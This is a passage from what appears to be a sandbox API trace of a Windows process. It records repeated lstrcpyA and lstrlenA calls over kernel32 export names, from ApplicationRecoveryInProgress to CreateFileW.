lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.882] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.882] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.882] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.882] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.882] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.883] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.883] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.883] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.883] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.883] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.883] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.883] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.883] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.883] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.883] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.883] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.883] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.883] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.883] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.883] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.883] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.883] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.883] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.883] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.883] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.883] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.883] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.883] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.883] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.883] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.883] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.883] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.883] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.883] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.883] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.883] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.883] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.883] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.883] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.883] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.883] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.883] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.884] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.884] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.884] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.884] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.884] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.884] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.884] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.884] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.884] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.884] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.884] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.884] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.884] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.884] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.884] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.884] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.884] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.884] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.884] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.884] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.884] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.884] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.884] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.884] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.884] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.884] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.884] lstrlenA (lpString="BEEP") returned 4 [0083.884] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.884] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.884] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.884] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.884] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.884] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.884] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.884] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.884] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.885] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.885] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.885] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.885] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.885] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.885] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.885] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.885] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.885] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.885] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.885] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.885] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.885] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.885] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.885] lstrlenA (lpString="CANCELIO") returned 8 [0083.885] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.885] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.885] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.885] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.885] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.885] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.885] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.885] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.885] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.885] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.885] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.885] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.885] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.885] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.885] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.885] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.885] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.885] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.885] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.885] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.885] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.885] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.886] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.886] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.886] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.886] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.886] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.886] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.886] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.886] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.886] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.886] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.886] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.886] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.886] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.886] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.886] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.886] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.886] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.886] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.886] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.886] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.886] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.886] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.886] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.886] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.886] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.886] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.886] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.886] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.886] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.886] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.886] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.886] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.886] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.886] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.886] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.886] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.886] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.887] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.887] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.887] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.887] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.887] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.887] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.887] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.887] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.887] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.887] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.887] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.887] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.887] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.887] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.887] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.887] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.887] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.887] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.887] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.887] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.887] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.887] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.887] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.887] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.887] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.887] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.887] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.887] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.887] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.887] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.887] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.887] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.887] lstrlenA (lpString="COPYFILEA") returned 9 [0083.887] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.887] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.887] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.887] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.888] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.888] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.888] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.888] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.888] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.888] lstrlenA (lpString="COPYFILEW") returned 9 [0083.888] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.888] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.888] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.888] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.888] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.888] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.888] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.888] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.888] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.888] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.888] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.888] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.888] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.888] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.888] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.888] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.888] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.888] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.888] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.888] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.888] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.888] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.888] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.888] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.888] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.888] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.888] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.888] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.888] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.888] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.888] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.889] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.889] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.889] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.889] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.889] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.889] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.889] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.889] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.889] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.889] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.889] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.889] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.889] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.889] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.889] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.889] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.889] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.889] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.889] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.889] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.889] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.889] lstrcpyA (in: lpString1=0x3f2d1ec, 